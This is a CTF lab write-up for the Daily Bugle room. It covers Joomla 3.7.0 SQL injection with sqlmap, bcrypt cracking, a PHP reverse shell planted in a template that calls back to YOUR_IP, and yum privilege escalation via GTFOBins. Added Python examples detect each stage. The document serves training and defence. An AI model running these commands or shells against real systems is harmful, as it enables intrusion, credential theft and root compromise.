Daily Bugle

advanced · 1h 15m · Writeup

Compromise a Joomla CMS account

Learning Objectives

  • Exploit Joomla vulnerability
  • SQL injection exploitation
  • Crack hashed passwords
  • Yum privilege escalation

Daily Bugle is a hard-rated room featuring Joomla CMS exploitation via SQL injection, hash cracking, and yum privilege escalation. Named after Spider-Man's newspaper, this box teaches advanced enumeration and exploitation.

This room requires patience with SQLMap and understanding of CMS vulnerabilities. J. Jonah Jameson would be furious about these security holes!

Reconnaissance

Start with comprehensive service enumeration:

bash
# Initial port scan
nmap -sV -sC -p- TARGET_IP
# Results:
# 22/tcp - SSH
# 80/tcp - HTTP (Apache)
# 3306/tcp - MySQL

# Web enumeration
gobuster dir -u http://TARGET_IP -w /usr/share/wordlists/dirb/common.txt
# Found: /administrator, /images, /templates, /modules

The website is running Joomla CMS. Let's identify the exact version:

bash
# Joomla version detection
curl -s http://TARGET_IP/administrator/manifests/files/joomla.xml | grep version
# or check /README.txt

# Using joomscan for comprehensive scan
joomscan -u http://TARGET_IP
# Joomla 3.7.0 detected - vulnerable to SQL injection!

Joomla SQL Injection

Joomla 3.7.0 is vulnerable to CVE-2017-8917, an SQL injection in the com_fields component. This affects the core CMS, not a plugin!

bash
# Search for exploit
searchsploit joomla 3.7
# Joomla! 3.7.0 - 'com_fields' SQL Injection

# Method 1: Manual SQLMap
sqlmap -u "http://TARGET_IP/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p 'list[fullordering]'

# Enumerate database
sqlmap -u "http://TARGET_IP/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomla --tables

# Dump users table
# '#__' is Joomla's table-prefix placeholder; substitute the real prefix
# shown by --tables when naming the users table
sqlmap -u "http://TARGET_IP/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomla -T '#__users' --dump

SQLMap Tips

SQLMap can take a long time. Use --threads=10 to speed up, but be careful not to crash the target. The #__users table contains admin credentials!
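The same injection leaves a clear trace on the server side: the com_fields view only ever builds `list[fullordering]` values of the form `<alias>.<column> ASC|DESC`, so anything else in that parameter is an attack. The following is an added example, not part of the original writeup, that scans Apache combined-format access logs for such requests. The log lines are constructed; the attacker lines mirror the sqlmap URL used above.

```python
"""Added example (not part of the original writeup): flag CVE-2017-8917-style
requests against Joomla's com_fields view in Apache access logs."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed combined-format log lines: line 2 is ordinary admin traffic,
# lines 3-4 mirror the sqlmap request used in the writeup.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:12:00:01 +0000] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:12:00:07 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.ordering%20ASC HTTP/1.1" 200 9001 "-" "Mozilla/5.0"
10.0.0.66 - - [10/Oct/2023:12:00:09 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml%280x23%2Cconcat%281%2Cuser%28%29%29%2C1%29 HTTP/1.1" 500 312 "-" "sqlmap/1.7"
10.0.0.66 - - [10/Oct/2023:12:00:10 +0000] "GET /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT%201)%20ASC HTTP/1.1" 200 9001 "-" "sqlmap/1.7"
""".splitlines()

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)')

# The only values the view legitimately produces are "<alias>.<column> ASC|DESC".
LEGIT_ORDERING = re.compile(r'^[a-z_]+\.[a-z_]+ (ASC|DESC)$', re.IGNORECASE)


def ordering_param(target):
    """Return the decoded list[fullordering] value of a request target, or None."""
    values = parse_qs(urlsplit(target).query).get('list[fullordering]')
    return values[0] if values else None


def is_com_fields_injection(target):
    """True when the request hits com_fields with an ordering value the view
    would never build itself (updatexml()/extractvalue() payloads, subqueries,
    anything with parentheses or extra keywords)."""
    query = parse_qs(urlsplit(target).query)
    if query.get('option', [''])[0] != 'com_fields':
        return False
    ordering = ordering_param(target)
    if ordering is None:
        return False
    return not LEGIT_ORDERING.match(ordering.strip())


def detect(lines):
    """Scan access-log lines and return one finding per injection attempt."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or not is_com_fields_injection(m['target']):
            continue
        findings.append({
            'ip': m['ip'],
            'time': m['ts'],
            'status': int(m['status']),
            'ordering': ordering_param(m['target']),
        })
    return findings


if __name__ == '__main__':
    for f in detect(SAMPLE_LOG):
        print(f"{f['ip']} {f['time']} HTTP {f['status']} -> {f['ordering']!r}")
```

Whitelisting the legitimate shape of the parameter, rather than blacklisting `updatexml`, also catches the blind and boolean variants sqlmap falls back to; the HTTP 500 on the error-based attempt is a second signal worth alerting on by itself.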

From the dump, you'll find:

# User found:
Username: jonah
Email: jonah@tryhackme.com
Password: $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm

# This is a bcrypt hash - crack it!

Hash Cracking

bash
# Save hash to file
echo '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm' > hash.txt

# Identify hash type (-m also prints the hashcat mode)
hashid -m hash.txt
# bcrypt (mode 3200 in hashcat)

# Crack with hashcat
hashcat -m 3200 hash.txt /usr/share/wordlists/rockyou.txt

# Or with john
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt

# Password found: spiderman123

Bcrypt hashes are slow to crack by design. This can take several minutes even with a good GPU. Perfect time to grab coffee!
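To see why the hash above is slow, it helps to read the fields hashid is reporting. The following is an added example, not part of the original writeup: it parses modular-crypt-format hashes (bcrypt, md5crypt, sha256/sha512crypt, and the legacy `md5(pass.salt):salt` layout older Joomla versions used), reports the hashcat mode, and turns the bcrypt cost into a wordlist time estimate. The benchmark rate passed to `bcrypt_wordlist_seconds` is an assumed figure, not a measurement.

```python
"""Added example (not part of the original writeup): identify modular-crypt
password hashes and expose the bcrypt work factor behind the slow crack."""
import re

BCRYPT_RE = re.compile(
    r'^\$(?P<variant>2[aby])\$(?P<cost>\d{2})\$(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]{31})$')
CRYPT_RE = re.compile(
    r'^\$(?P<id>1|5|6)\$(?:rounds=(?P<rounds>\d+)\$)?(?P<salt>[^$]{1,16})\$(?P<digest>[./A-Za-z0-9]+)$')
# Joomla < 2.5.18 stored md5(password + salt):salt, hashcat mode 11
JOOMLA_LEGACY_RE = re.compile(r'^(?P<digest>[0-9a-f]{32}):(?P<salt>[A-Za-z0-9]{16})$')

CRYPT_IDS = {'1': ('md5crypt', 500), '5': ('sha256crypt', 7400), '6': ('sha512crypt', 1800)}


def identify_hash(h):
    """Return a dict (name, hashcat mode, salt, work factor) or None if unknown."""
    h = h.strip()
    m = BCRYPT_RE.match(h)
    if m:
        cost = int(m['cost'])
        # bcrypt runs 2**cost key-setup rounds; "$2y$10$" means 1024 of them
        return {'name': 'bcrypt', 'variant': m['variant'], 'hashcat_mode': 3200,
                'salt': m['salt'], 'cost': cost, 'rounds': 2 ** cost}
    m = CRYPT_RE.match(h)
    if m:
        name, mode = CRYPT_IDS[m['id']]
        # md5crypt is fixed at 1000 iterations; sha*crypt default to 5000
        rounds = int(m['rounds']) if m['rounds'] else (1000 if m['id'] == '1' else 5000)
        return {'name': name, 'hashcat_mode': mode, 'salt': m['salt'], 'rounds': rounds}
    m = JOOMLA_LEGACY_RE.match(h)
    if m:
        return {'name': 'joomla-legacy md5(pass.salt)', 'hashcat_mode': 11,
                'salt': m['salt'], 'rounds': 1}
    return None


def bcrypt_wordlist_seconds(info, candidates, bench_rate_cost5):
    """Seconds to exhaust `candidates` passwords against one bcrypt hash.
    hashcat benchmarks mode 3200 at cost 5, and each +1 cost halves throughput."""
    rate = bench_rate_cost5 / 2 ** (info['cost'] - 5)
    return candidates / rate


if __name__ == '__main__':
    info = identify_hash('$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm')
    print(info)
    # Assumed figures: ~14 million candidates (rockyou-sized list) and a GPU
    # benchmark of 20,000 H/s at cost 5; neither value is from the writeup.
    print(round(bcrypt_wordlist_seconds(info, 14_000_000, 20_000)), 'seconds')
```

The estimate is the point of the exercise: at cost 10 a rate of 20,000 H/s becomes 625 H/s, so a rockyou-sized list takes hours on one hash rather than seconds, and the same password stored as legacy `md5(pass.salt)` would fall in well under a second.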

Getting a Shell

Joomla Admin to Shell

1. Login to Admin Panel: Access /administrator and log in with jonah:spiderman123
2. Navigate to Templates: Extensions → Templates → Templates
3. Edit Template File: Select Protostar → error.php (or index.php)
4. Inject Reverse Shell: Replace the content with a PHP reverse shell
5. Trigger Shell: Visit a non-existent page to trigger error.php, or visit /templates/protostar/index.php

bash
# Start listener
nc -lvnp 4444

# PHP reverse shell (insert in template)
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'");
?>

# Trigger: visit http://TARGET_IP/templates/protostar/error.php
# Shell received as apache user!
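The template edit is easy to catch on the defensive side because Joomla's shipped templates change only on upgrade. The following is an added example, not part of the original writeup: it baselines the SHA-256 of every PHP file under a templates directory, reports new or modified files, and flags those among them that contain shell-spawning constructs. The directory layout and file contents are constructed in a temporary directory so the script runs offline; `ATTACKER_IP` is a placeholder.

```python
"""Added example (not part of the original writeup): detect edited or dropped
PHP files under a Joomla templates directory via a hash baseline."""
import hashlib
import os
import re
import tempfile

# Constructs a web shell or reverse shell needs and a shipped template never uses
SUSPICIOUS = re.compile(
    r'/dev/tcp/'
    r'|\b(?:exec|shell_exec|system|passthru|popen|proc_open|eval)\s*\('
    r'|base64_decode\s*\(')


def sha256_of(path):
    h = hashlib.sha256()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(65536), b''):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root):
    """Map every .php file under root (path relative to root) to its SHA-256."""
    out = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.endswith('.php'):
                full = os.path.join(dirpath, name)
                out[os.path.relpath(full, root).replace(os.sep, '/')] = sha256_of(full)
    return out


def diff_against_baseline(root, baseline):
    """Compare the tree with a trusted baseline. Returns new, modified and
    missing files, plus the subset of new/modified files with shell code."""
    current = snapshot(root)
    new = sorted(p for p in current if p not in baseline)
    modified = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    missing = sorted(p for p in baseline if p not in current)
    suspicious = []
    for rel in new + modified:
        with open(os.path.join(root, rel), errors='replace') as f:
            if SUSPICIOUS.search(f.read()):
                suspicious.append(rel)
    return {'new': new, 'modified': modified, 'missing': missing,
            'suspicious': sorted(suspicious)}


def demo():
    """Build a constructed templates tree, baseline it, then apply the kind of
    edits the writeup makes and return what the check reports."""
    with tempfile.TemporaryDirectory() as root:
        proto = os.path.join(root, 'protostar')
        os.makedirs(proto)
        clean = {
            'index.php': "<?php defined('_JEXEC') or die;\necho 'template';\n",
            'error.php': "<?php defined('_JEXEC') or die;\necho 'error page';\n",
        }
        for name, body in clean.items():
            with open(os.path.join(proto, name), 'w') as f:
                f.write(body)
        baseline = snapshot(root)  # taken from the trusted install

        # Constructed attacker edit mirroring the writeup's payload (placeholder IP)
        with open(os.path.join(proto, 'error.php'), 'w') as f:
            f.write("<?php\nexec(\"/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'\");\n?>\n")
        # A benign edit: wording change only, should show as modified but not suspicious
        with open(os.path.join(proto, 'index.php'), 'w') as f:
            f.write("<?php defined('_JEXEC') or die;\necho 'template v2';\n")
        # A brand-new file dropped beside the template (constructed web shell)
        with open(os.path.join(proto, 'cmd.php'), 'w') as f:
            f.write("<?php system($_GET['c']); ?>\n")
        return diff_against_baseline(root, baseline)


if __name__ == '__main__':
    for key, paths in demo().items():
        print(f'{key}: {paths}')
```

In production the baseline comes from a clean install or the package checksums, and the check runs from cron as a user other than the one the web server runs as, so a compromised apache account cannot rewrite the baseline. Mounting the templates directory read-only, or disabling the template editor for non-super-users, removes the edit path altogether.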

Lateral Movement

The apache user has limited privileges. Look for credentials:

bash
# Stabilize shell
python -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

# Check Joomla configuration
cat /var/www/html/configuration.php
# Database credentials found!

# Look for users
grep -v nologin /etc/passwd
# Found: jjameson

# Check Joomla config for passwords
grep -i password /var/www/html/configuration.php
# public $password = 'nv5uz9r3ZEDzVjNu';

# Try password reuse
su jjameson
Password: nv5uz9r3ZEDzVjNu
# Success!

cat /home/jjameson/user.txt

Privilege Escalation - Yum

bash
# Check sudo permissions
sudo -l
# (root) NOPASSWD: /usr/bin/yum

# Yum can run commands via plugins!

GTFOBins

Always check GTFOBins for sudo binaries. Yum has a well-documented privilege escalation path using custom plugins.

bash
# Method 1: Spawn shell via yum
TF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF

cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF

cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
    os.execl('/bin/sh','/bin/sh')
EOF

sudo yum -c $TF/x --enableplugin=y
# Root shell!

# Method 2: Simpler approach
sudo yum localinstall -y /dev/stdin <<< 'Summary: pwned
Name: pwned
Version: 1
Release: 1
License: GPL
Group: System Environment/Base

%post
/bin/bash -i >& /dev/tcp/YOUR_IP/5555 0>&1

%description
Malicious package for privesc

%files'

bash
# Get root flag
cat /root/root.txt
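The `sudo -l` finding is the whole privilege escalation, so it is worth auditing for before an attacker does. The following is an added example, not part of the original writeup: it parses sudoers rules and flags entries that hand a non-root user a binary GTFOBins documents as shell-capable under sudo, with yum's `NOPASSWD` rule as the headline case. The sudoers fragment is constructed; the binary list is a subset of GTFOBins' sudo entries, not the full catalogue.

```python
"""Added example (not part of the original writeup): audit sudoers rules for
shell-capable binaries such as the NOPASSWD yum entry found with `sudo -l`."""
import re
from os.path import basename

# Constructed /etc/sudoers excerpt: the jjameson rule matches the writeup,
# the others show the neighbouring cases an auditor meets.
SAMPLE_SUDOERS = """
Defaults    env_reset
root        ALL=(ALL)       ALL
%wheel      ALL=(ALL)       ALL
jjameson    ALL=(root) NOPASSWD: /usr/bin/yum
deploy      ALL=(root) NOPASSWD: /usr/bin/systemctl restart httpd  # fixed arguments
backup      ALL=(root) /usr/bin/rsync
"""

# Package managers and other binaries GTFOBins lists with a sudo shell escape
SHELL_CAPABLE = {
    'yum', 'dnf', 'apt', 'apt-get', 'rpm', 'pip', 'python', 'python3', 'perl',
    'vi', 'vim', 'less', 'more', 'find', 'awk', 'tar', 'zip', 'rsync', 'systemctl',
}

RULE_RE = re.compile(
    r'^(?P<who>[^\s#]+)\s+(?P<hosts>\S+)\s*=\s*\((?P<runas>[^)]*)\)\s*'
    r'(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$')


def parse_rules(text):
    """Yield (user, runas, nopasswd, command) for every command in every rule."""
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()
        if not line or line.startswith('Defaults'):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        nopasswd = 'NOPASSWD' in m['tags']
        for cmd in m['cmds'].split(','):
            yield m['who'], m['runas'], nopasswd, cmd.strip()


def audit(text):
    """Return findings for rules that let a non-root principal reach a shell."""
    findings = []
    for user, runas, nopasswd, cmd in parse_rules(text):
        if user == 'root':
            continue
        if cmd == 'ALL':
            severity, binary, args = 'critical', 'ALL', []
        else:
            tokens = cmd.split()
            binary, args = basename(tokens[0]), tokens[1:]
            if binary not in SHELL_CAPABLE:
                continue
            # sudoers enforces fixed arguments exactly, which blocks the tricks that
            # rely on extra flags (yum's -c/--enableplugin); no arguments means the
            # user chooses them, so treat that as high.
            severity = 'medium' if args else 'high'
        findings.append({'user': user, 'runas': runas, 'binary': binary,
                         'args': ' '.join(args), 'nopasswd': nopasswd,
                         'severity': severity})
    return findings


if __name__ == '__main__':
    for f in audit(SAMPLE_SUDOERS):
        flag = ' NOPASSWD' if f['nopasswd'] else ''
        print(f"[{f['severity']}] {f['user']} -> ({f['runas']}){flag} {f['binary']} {f['args']}".rstrip())
```

Running this over the real file needs root (sudoers is mode 0440), and `#include`/`#includedir` fragments under `/etc/sudoers.d` have to be fed in as well. The remediation for the writeup's case is to pin the arguments (`/usr/bin/yum update`) or, better, to move package updates to a service account driven by configuration management so nobody needs sudo to yum at all.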

Knowledge Check

Quick Quiz

What CVE affects Joomla 3.7.0?

Key Takeaways

  • Joomla version detection reveals exploitable vulnerabilities
  • CMS admin panels allow template editing for shell injection
  • Configuration files often contain reusable passwords
  • Package managers (yum, apt) with sudo can be exploited via plugins
  • GTFOBins is essential for sudo privilege escalation research